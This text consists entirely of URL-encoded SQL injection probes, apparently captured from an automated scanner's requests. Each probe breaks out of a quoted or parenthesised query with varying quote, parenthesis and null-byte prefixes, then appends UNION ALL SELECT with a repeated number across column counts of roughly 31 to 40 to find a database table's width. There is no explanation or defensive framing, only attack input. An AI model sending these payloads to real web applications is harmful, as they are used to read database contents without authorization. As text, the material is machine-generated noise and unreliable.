-1937%25%27%29%29%20UNION%20ALL%20SELECT%203921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%23 -9163%25%27%29%29%29%20UNION%20ALL%20SELECT%206508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%23 -8492%25%27%29%29%29%20UNION%20ALL%20SELECT%201193%2C1193%2C1193%2C1193%2C1193%2C1193%2C1193%2C1193%2C1193%2C1193%2C1193%2C1193%2C1193%2C1193%2C1193%2C1193%2C1193%2C1193%2C1193%2C1193%2C1193%2C1193%2C1193%2C1193%2C1193%2C1193%2C1193%2C1193%2C1193%2C1193%2C1193%2C1193%23 -1546%25%27%29%29%29%20UNION%20ALL%20SELECT%205994%2C5994%2C5994%2C5994%2C5994%2C5994%2C5994%2C5994%2C5994%2C5994%2C5994%2C5994%2C5994%2C5994%2C5994%2C5994%2C5994%2C5994%2C5994%2C5994%2C5994%2C5994%2C5994%2C5994%2C5994%2C5994%2C5994%2C5994%2C5994%2C5994%2C5994%2C5994%2C5994%23 -8977%25%27%29%29%29%20UNION%20ALL%20SELECT%205468%2C5468%2C5468%2C5468%2C5468%2C5468%2C5468%2C5468%2C5468%2C5468%2C5468%2C5468%2C5468%2C5468%2C5468%2C5468%2C5468%2C5468%2C5468%2C5468%2C5468%2C5468%2C5468%2C5468%2C5468%2C5468%2C5468%2C5468%2C5468%2C5468%2C5468%2C5468%2C5468%2C5468%23 -6350%25%27%29%29%29%20UNION%20ALL%20SELECT%208030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%23 -5611%25%27%29%29%29%20UNION%20ALL%20SELECT%203672%2C3672%2C3672%2C3672%2C3672%2C3672%2C3672%2C3672%2C3672%2C3672%2C3672%2C3672%2C3672%2C3672%2C3672%2C3672%2C3672%2C3672%2C3672%2C3672%2C3672%2C3672%2C3672%2C3672%2C3672%2C3672%2C3672%2C3672%2C3672%2C3672%2C3672%2C3672%2C3672%2C3672%2C3672%2C3672%23 -1410%25%27%29%29%29%20UNION%20ALL%20SELECT%204986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%23 -6511%25%27%29%29%29%20UNION%20ALL%20SELECT%202771%2C2771%2C2771%2C2771%2C2771%2C2771%2C2771%2C2771%2C2771%2C2771%2C2771%2C2771%2C2771%2C2771%2C2771%2C2771%2C2771%2C2771%2C2771%2C2771%2C2771%2C2771%2C2771%2C2771%2C2771%2C2771%2C2771%2C2771%2C2771%2C2771%2C2771%2C2771%2C2771%2C2771%2C2771%2C2771%2C2771%2C2771%23 -7128%25%27%29%29%29%20UNION%20ALL%20SELECT%208299%2C8299%2C8299%2C8299%2C8299%2C8299%2C8299%2C8299%2C8299%2C8299%2C8299%2C8299%2C8299%2C8299%2C8299%2C8299%2C8299%2C8299%2C8299%2C8299%2C8299%2C8299%2C8299%2C8299%2C8299%2C8299%2C8299%2C8299%2C8299%2C8299%2C8299%2C8299%2C8299%2C8299%2C8299%2C8299%2C8299%2C8299%2C8299%23 -9295%25%27%29%29%29%20UNION%20ALL%20SELECT%206961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%23 -5903%25%27%20UNION%20ALL%20SELECT%203521%2C3521%2C3521%2C3521%2C3521%2C3521%2C3521%2C3521%2C3521%2C3521%2C3521%2C3521%2C3521%2C3521%2C3521%2C3521%2C3521%2C3521%2C3521%2C3521%2C3521%2C3521%2C3521%2C3521%2C3521%2C3521%2C3521%2C3521%2C3521%2C3521%2C3521%23 -1924%25%27%20UNION%20ALL%20SELECT%202523%2C2523%2C2523%2C2523%2C2523%2C2523%2C2523%2C2523%2C2523%2C2523%2C2523%2C2523%2C2523%2C2523%2C2523%2C2523%2C2523%2C2523%2C2523%2C2523%2C2523%2C2523%2C2523%2C2523%2C2523%2C2523%2C2523%2C2523%2C2523%2C2523%2C2523%2C2523%23 -9520%25%27%20UNION%20ALL%20SELECT%201420%2C1420%2C1420%2C1420%2C1420%2C1420%2C1420%2C1420%2C1420%2C1420%2C1420%2C1420%2C1420%2C1420%2C1420%2C1420%2C1420%2C1420%2C1420%2C1420%2C1420%2C1420%2C1420%2C1420%2C1420%2C1420%2C1420%2C1420%2C1420%2C1420%2C1420%2C1420%2C1420%23 -7880%25%27%20UNION%20ALL%20SELECT%207305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%23 -7156%25%27%20UNION%20ALL%20SELECT%203389%2C3389%2C3389%2C3389%2C3389%2C3389%2C3389%2C3389%2C3389%2C3389%2C3389%2C3389%2C3389%2C3389%2C3389%2C3389%2C3389%2C3389%2C3389%2C3389%2C3389%2C3389%2C3389%2C3389%2C3389%2C3389%2C3389%2C3389%2C3389%2C3389%2C3389%2C3389%2C3389%2C3389%2C3389%23 -5050%25%27%20UNION%20ALL%20SELECT%204790%2C4790%2C4790%2C4790%2C4790%2C4790%2C4790%2C4790%2C4790%2C4790%2C4790%2C4790%2C4790%2C4790%2C4790%2C4790%2C4790%2C4790%2C4790%2C4790%2C4790%2C4790%2C4790%2C4790%2C4790%2C4790%2C4790%2C4790%2C4790%2C4790%2C4790%2C4790%2C4790%2C4790%2C4790%2C4790%23 -2788%25%27%20UNION%20ALL%20SELECT%207693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%23 -5519%25%27%20UNION%20ALL%20SELECT%208310%2C8310%2C8310%2C8310%2C8310%2C8310%2C8310%2C8310%2C8310%2C8310%2C8310%2C8310%2C8310%2C8310%2C8310%2C8310%2C8310%2C8310%2C8310%2C8310%2C8310%2C8310%2C8310%2C8310%2C8310%2C8310%2C8310%2C8310%2C8310%2C8310%2C8310%2C8310%2C8310%2C8310%2C8310%2C8310%2C8310%2C8310%23 -5428%25%27%20UNION%20ALL%20SELECT%204580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%23 -7774%25%27%20UNION%20ALL%20SELECT%207629%2C7629%2C7629%2C7629%2C7629%2C7629%2C7629%2C7629%2C7629%2C7629%2C7629%2C7629%2C7629%2C7629%2C7629%2C7629%2C7629%2C7629%2C7629%2C7629%2C7629%2C7629%2C7629%2C7629%2C7629%2C7629%2C7629%2C7629%2C7629%2C7629%2C7629%2C7629%2C7629%2C7629%2C7629%2C7629%2C7629%2C7629%2C7629%2C7629%23 -9418%00%27%29%20UNION%20ALL%20SELECT%207226%2C7226%2C7226%2C7226%2C7226%2C7226%2C7226%2C7226%2C7226%2C7226%2C7226%2C7226%2C7226%2C7226%2C7226%2C7226%2C7226%2C7226%2C7226%2C7226%2C7226%2C7226%2C7226%2C7226%2C7226%2C7226%2C7226%2C7226%2C7226%2C7226%2C7226%23 -8688%00%27%29%20UNION%20ALL%20SELECT%209312%2C9312%2C9312%2C9312%2C9312%2C9312%2C9312%2C9312%2C9312%2C9312%2C9312%2C9312%2C9312%2C9312%2C9312%2C9312%2C9312%2C9312%2C9312%2C9312%2C9312%2C9312%2C9312%2C9312%2C9312%2C9312%2C9312%2C9312%2C9312%2C9312%2C9312%2C9312%23 -7078%00%27%29%20UNION%20ALL%20SELECT%207885%2C7885%2C7885%2C7885%2C7885%2C7885%2C7885%2C7885%2C7885%2C7885%2C7885%2C7885%2C7885%2C7885%2C7885%2C7885%2C7885%2C7885%2C7885%2C7885%2C7885%2C7885%2C7885%2C7885%2C7885%2C7885%2C7885%2C7885%2C7885%2C7885%2C7885%2C7885%2C7885%23 -3945%00%27%29%20UNION%20ALL%20SELECT%202539%2C2539%2C2539%2C2539%2C2539%2C2539%2C2539%2C2539%2C2539%2C2539%2C2539%2C2539%2C2539%2C2539%2C2539%2C2539%2C2539%2C2539%2C2539%2C2539%2C2539%2C2539%2C2539%2C2539%2C2539%2C2539%2C2539%2C2539%2C2539%2C2539%2C2539%2C2539%2C2539%2C2539%23 -3672%00%27%29%20UNION%20ALL%20SELECT%208973%2C8973%2C8973%2C8973%2C8973%2C8973%2C8973%2C8973%2C8973%2C8973%2C8973%2C8973%2C8973%2C8973%2C8973%2C8973%2C8973%2C8973%2C8973%2C8973%2C8973%2C8973%2C8973%2C8973%2C8973%2C8973%2C8973%2C8973%2C8973%2C8973%2C8973%2C8973%2C8973%2C8973%2C8973%23 -5533%00%27%29%20UNION%20ALL%20SELECT%201842%2C1842%2C1842%2C1842%2C1842%2C1842%2C1842%2C1842%2C1842%2C1842%2C1842%2C1842%2C1842%2C1842%2C1842%2C1842%2C1842%2C1842%2C1842%2C1842%2C1842%2C1842%2C1842%2C1842%2C1842%2C1842%2C1842%2C1842%2C1842%2C1842%2C1842%2C1842%2C1842%2C1842%2C1842%2C1842%23 -4517%00%27%29%20UNION%20ALL%20SELECT%201494%2C1494%2C1494%2C1494%2C1494%2C1494%2C1494%2C1494%2C1494%2C1494%2C1494%2C1494%2C1494%2C1494%2C1494%2C1494%2C1494%2C1494%2C1494%2C1494%2C1494%2C1494%2C1494%2C1494%2C1494%2C1494%2C1494%2C1494%2C1494%2C1494%2C1494%2C1494%2C1494%2C1494%2C1494%2C1494%2C1494%23 -7266%00%27%29%20UNION%20ALL%20SELECT%203322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%23 -9519%00%27%29%20UNION%20ALL%20SELECT%201875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%23 -7618%00%27%29%20UNION%20ALL%20SELECT%203349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%23 -3183%00%27%20UNION%20ALL%20SELECT%204446%2C4446%2C4446%2C4446%2C4446%2C4446%2C4446%2C4446%2C4446%2C4446%2C4446%2C4446%2C4446%2C4446%2C4446%2C4446%2C4446%2C4446%2C4446%2C4446%2C4446%2C4446%2C4446%2C4446%2C4446%2C4446%2C4446%2C4446%2C4446%2C4446%2C4446%23 -3408%00%27%20UNION%20ALL%20SELECT%201683%2C1683%2C1683%2C1683%2C1683%2C1683%2C1683%2C1683%2C1683%2C1683%2C1683%2C1683%2C1683%2C1683%2C1683%2C1683%2C1683%2C1683%2C1683%2C1683%2C1683%2C1683%2C1683%2C1683%2C1683%2C1683%2C1683%2C1683%2C1683%2C1683%2C1683%2C1683%23 -9606%00%27%20UNION%20ALL%20SELECT%204739%2C4739%2C4739%2C4739%2C4739%2C4739%2C4739%2C4739%2C4739%2C4739%2C4739%2C4739%2C4739%2C4739%2C4739%2C4739%2C4739%2C4739%2C4739%2C4739%2C4739%2C4739%2C4739%2C4739%2C4739%2C4739%2C4739%2C4739%2C4739%2C4739%2C4739%2C4739%2C4739%23 -6491%00%27%20UNION%20ALL%20SELECT%208650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%23 -4678%00%27%20UNION%20ALL%20SELECT%208413%2C8413%2C8413%2C8413%2C8413%2C8413%2C8413%2C8413%2C8413%2C8413%2C8413%2C8413%2C8413%2C8413%2C8413%2C8413%2C8413%2C8413%2C8413%2C8413%2C8413%2C8413%2C8413%2C8413%2C8413%2C8413%2C8413%2C8413%2C8413%2C8413%2C8413%2C8413%2C8413%2C8413%2C8413%23 -7018%00%27%20UNION%20ALL%20SELECT%203941%2C3941%2C3941%2C3941%2C3941%2C3941%2C3941%2C3941%2C3941%2C3941%2C3941%2C3941%2C3941%2C3941%2C3941%2C3941%2C3941%2C3941%2C3941%2C3941%2C3941%2C3941%2C3941%2C3941%2C3941%2C3941%2C3941%2C3941%2C3941%2C3941%2C3941%2C3941%2C3941%2C3941%2C3941%2C3941%23 -9216%00%27%20UNION%20ALL%20SELECT%202386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%23 -5527%00%27%20UNION%20ALL%20SELECT%202868%2C2868%2C2868%2C2868%2C2868%2C2868%2C2868%2C2868%2C2868%2C2868%2C2868%2C2868%2C2868%2C2868%2C2868%2C2868%2C2868%2C2868%2C2868%2C2868%2C2868%2C2868%2C2868%2C2868%2C2868%2C2868%2C2868%2C2868%2C2868%2C2868%2C2868%2C2868%2C2868%2C2868%2C2868%2C2868%2C2868%2C2868%23 -9746%00%27%20UNION%20ALL%20SELECT%204810%2C4810%2C4810%2C4810%2C4810%2C4810%2C4810%2C4810%2C4810%2C4810%2C4810%2C4810%2C4810%2C4810%2C4810%2C4810%2C4810%2C4810%2C4810%2C4810%2C4810%2C4810%2C4810%2C4810%2C4810%2C4810%2C4810%2C4810%2C4810%2C4810%2C4810%2C4810%2C4810%2C4810%2C4810%2C4810%2C4810%2C4810%2C4810%23 -8863%00%27%20UNION%20ALL%20SELECT%201540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%23 -5718%27%29%20WHERE%201921%3D1921%20UNION%20ALL%20SELECT%201921%2C1921%2C1921%2C1921%2C1921%2C1921%2C1921%2C1921%2C1921%2C1921%2C1921%2C1921%2C1921%2C1921%2C1921%2C1921%2C1921%2C1921%2C1921%2C1921%2C1921%2C1921%2C1921%2C1921%2C1921%2C1921%2C1921%2C1921%2C1921%2C1921%2C1921%23 -3587%27%29%20WHERE%206830%3D6830%20UNION%20ALL%20SELECT%206830%2C6830%2C6830%2C6830%2C6830%2C6830%2C6830%2C6830%2C6830%2C6830%2C6830%2C6830%2C6830%2C6830%2C6830%2C6830%2C6830%2C6830%2C6830%2C6830%2C6830%2C6830%2C6830%2C6830%2C6830%2C6830%2C6830%2C6830%2C6830%2C6830%2C6830%2C6830%23 -7554%27%29%20WHERE%203048%3D3048%20UNION%20ALL%20SELECT%203048%2C3048%2C3048%2C3048%2C3048%2C3048%2C3048%2C3048%2C3048%2C3048%2C3048%2C3048%2C3048%2C3048%2C3048%2C3048%2C3048%2C3048%2C3048%2C3048%2C3048%2C3048%2C3048%2C3048%2C3048%2C3048%2C3048%2C3048%2C3048%2C3048%2C3048%2C3048%2C3048%23 -9811%27%29%20WHERE%206284%3D6284%20UNION%20ALL%20SELECT%206284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%23 -6673%27%29%20WHERE%208686%3D8686%20UNION%20ALL%20SELECT%208686%2C8686%2C8686%2C8686%2C8686%2C8686%2C8686%2C8686%2C8686%2C8686%2C8686%2C8686%2C8686%2C8686%2C8686%2C8686%2C8686%2C8686%2C8686%2C8686%2C8686%2C8686%2C8686%2C8686%2C8686%2C8686%2C8686%2C8686%2C8686%2C8686%2C8686%2C8686%2C8686%2C8686%2C8686%23 -7238%27%29%20WHERE%206163%3D6163%20UNION%20ALL%20SELECT%206163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%23 -1015%27%29%20WHERE%205226%3D5226%20UNION%20ALL%20SELECT%205226%2C5226%2C5226%2C5226%2C5226%2C5226%2C5226%2C5226%2C5226%2C5226%2C5226%2C5226%2C5226%2C5226%2C5226%2C5226%2C5226%2C5226%2C5226%2C5226%2C5226%2C5226%2C5226%2C5226%2C5226%2C5226%2C5226%2C5226%2C5226%2C5226%2C5226%2C5226%2C5226%2C5226%2C5226%2C5226%2C5226%23 -8798%27%29%20WHERE%202879%3D2879%20UNION%20ALL%20SELECT%202879%2C2879%2C2879%2C2879%2C2879%2C2879%2C2879%2C2879%2C2879%2C2879%2C2879%2C2879%2C2879%2C2879%2C2879%2C2879%2C2879%2C2879%2C2879%2C2879%2C2879%2C2879%2C2879%2C2879%2C2879%2C2879%2C2879%2C2879%2C2879%2C2879%2C2879%2C2879%2C2879%2C2879%2C2879%2C2879%2C2879%2C2879%23 -3426%27%29%20WHERE%207875%3D7875%20UNION%20ALL%20SELECT%207875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%23 -1633%27%29%20WHERE%202354%3D2354%20UNION%20ALL%20SELECT%202354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%23 -1041%22%29%20WHERE%208543%3D8543%20UNION%20ALL%20SELECT%208543%2C8543%2C8543%2C8543%2C8543%2C8543%2C8543%2C8543%2C8543%2C8543%2C8543%2C8543%2C8543%2C8543%2C8543%2C8543%2C8543%2C8543%2C8543%2C8543%2C8543%2C8543%2C8543%2C8543%2C8543%2C8543%2C8543%2C8543%2C8543%2C8543%2C8543%23 -1751%22%29%20WHERE%206701%3D6701%20UNION%20ALL%20SELECT%206701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%23 -1445%22%29%20WHERE%208201%3D8201%20UNION%20ALL%20SELECT%208201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%23 -8555%22%29%20WHERE%201900%3D1900%20UNION%20ALL%20SELECT%201900%2C1900%2C1900%2C1900%2C1900%2C1900%2C1900%2C1900%2C1900%2C1900%2C1900%2C1900%2C1900%2C1900%2C1900%2C1900%2C1900%2C1900%2C1900%2C1900%2C1900%2C1900%2C1900%2C1900%2C1900%2C1900%2C1900%2C1900%2C1900%2C1900%2C1900%2C1900%2C1900%2C1900%23 -6654%22%29%20WHERE%207337%3D7337%20UNION%20ALL%20SELECT%207337%2C7337%2C7337%2C7337%2C7337%2C7337%2C7337%2C7337%2C7337%2C7337%2C7337%2C7337%2C7337%2C7337%2C7337%2C7337%2C7337%2C7337%2C7337%2C7337%2C7337%2C7337%2C7337%2C7337%2C7337%2C7337%2C7337%2C7337%2C7337%2C7337%2C7337%2C7337%2C7337%2C7337%2C7337%23 -7281%22%29%20WHERE%207215%3D7215%20UNION%20ALL%20SELECT%207215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%23 -7915%22%29%20WHERE%202191%3D2191%20UNION%20ALL%20SELECT%202191%2C2191%2C2191%2C2191%2C2191%2C2191%2C2191%2C2191%2C2191%2C2191%2C2191%2C2191%2C2191%2C2191%2C2191%2C2191%2C2191%2C2191%2C2191%2C2191%2C2191%2C2191%2C2191%2C2191%2C2191%2C2191%2C2191%2C2191%2C2191%2C2191%2C2191%2C2191%2C2191%2C2191%2C2191%2C2191%2C2191%23 -2520%22%29%20WHERE%205059%3D5059%20UNION%20ALL%20SELECT%205059%2C5059%2C5059%2C5059%2C5059%2C5059%2C5059%2C5059%2C5059%2C5059%2C5059%2C5059%2C5059%2C5059%2C5059%2C5059%2C5059%2C5059%2C5059%2C5059%2C5059%2C5059%2C5059%2C5059%2C5059%2C5059%2C5059%2C5059%2C5059%2C5059%2C5059%2C5059%2C5059%2C5059%2C5059%2C5059%2C5059%2C5059%23 -8896%22%29%20WHERE%209779%3D9779%20UNION%20ALL%20SELECT%209779%2C9779%2C9779%2C9779%2C9779%2C9779%2C9779%2C9779%2C9779%2C9779%2C9779%2C9779%2C9779%2C9779%2C9779%2C9779%2C9779%2C9779%2C9779%2C9779%2C9779%2C9779%2C9779%2C9779%2C9779%2C9779%2C9779%2C9779%2C9779%2C9779%2C9779%2C9779%2C9779%2C9779%2C9779%2C9779%2C9779%2C9779%2C9779%23 -1093%22%29%20WHERE%205960%3D5960%20UNION%20ALL%20SELECT%205960%2C5960%2C5960%2C5960%2C5960%2C5960%2C5960%2C5960%2C5960%2C5960%2C5960%2C5960%2C5960%2C5960%2C5960%2C5960%2C5960%2C5960%2C5960%2C5960%2C5960%2C5960%2C5960%2C5960%2C5960%2C5960%2C5960%2C5960%2C5960%2C5960%2C5960%2C5960%2C5960%2C5960%2C5960%2C5960%2C5960%2C5960%2C5960%2C5960%23 -5311%29%20WHERE%208572%3D8572%20UNION%20ALL%20SELECT%208572%2C8572%2C8572%2C8572%2C8572%2C8572%2C8572%2C8572%2C8572%2C8572%2C8572%2C8572%2C8572%2C8572%2C8572%2C8572%2C8572%2C8572%2C8572%2C8572%2C8572%2C8572%2C8572%2C8572%2C8572%2C8572%2C8572%2C8572%2C8572%2C8572%2C8572%23 -1207%29%20WHERE%201070%3D1070%20UNION%20ALL%20SELECT%201070%2C1070%2C1070%2C1070%2C1070%2C1070%2C1070%2C1070%2C1070%2C1070%2C1070%2C1070%2C1070%2C1070%2C1070%2C1070%2C1070%2C1070%2C1070%2C1070%2C1070%2C1070%2C1070%2C1070%2C1070%2C1070%2C1070%2C1070%2C1070%2C1070%2C1070%2C1070%23 -6342%29%20WHERE%203770%3D3770%20UNION%20ALL%20SELECT%203770%2C3770%2C3770%2C3770%2C3770%2C3770%2C3770%2C3770%2C3770%2C3770%2C3770%2C3770%2C3770%2C3770%2C3770%2C3770%2C3770%2C3770%2C3770%2C3770%2C3770%2C3770%2C3770%2C3770%2C3770%2C3770%2C3770%2C3770%2C3770%2C3770%2C3770%2C3770%2C3770%23 -2334%29%20WHERE%209410%3D9410%20UNION%20ALL%20SELECT%209410%2C9410%2C9410%2C9410%2C9410%2C9410%2C9410%2C9410%2C9410%2C9410%2C9410%2C9410%2C9410%2C9410%2C9410%2C9410%2C9410%2C9410%2C9410%2C9410%2C9410%2C9410%2C9410%2C9410%2C9410%2C9410%2C9410%2C9410%2C9410%2C9410%2C9410%2C9410%2C9410%2C9410%23 -2754%29%20WHERE%201004%3D1004%20UNION%20ALL%20SELECT%201004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%23 -9197%29%20WHERE%203482%3D3482%20UNION%20ALL%20SELECT%203482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%23 -9274%29%20WHERE%203938%3D3938%20UNION%20ALL%20SELECT%203938%2C3938%2C3938%2C3938%2C3938%2C3938%2C3938%2C3938%2C3938%2C3938%2C3938%2C3938%2C3938%2C3938%2C3938%2C3938%2C3938%2C3938%2C3938%2C3938%2C3938%2C3938%2C3938%2C3938%2C3938%2C3938%2C3938%2C3938%2C3938%2C3938%2C3938%2C3938%2C3938%2C3938%2C3938%2C3938%2C3938%23 -5014%29%20WHERE%204261%3D4261%20UNION%20ALL%20SELECT%204261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%23 -8650%29%20WHERE%203390%3D3390%20UNION%20ALL%20SELECT%203390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%23 -7453%29%20WHERE%208877%3D8877%20UNION%20ALL%20SELECT%208877%2C8877%2C8877%2C8877%2C8877%2C8877%2C8877%2C8877%2C8877%2C8877%2C8877%2C8877%2C8877%2C8877%2C8877%2C8877%2C8877%2C8877%2C8877%2C8877%2C8877%2C8877%2C8877%2C8877%2C8877%2C8877%2C8877%2C8877%2C8877%2C8877%2C8877%2C8877%2C8877%2C8877%2C8877%2C8877%2C8877%2C8877%2C8877%2C8877%23 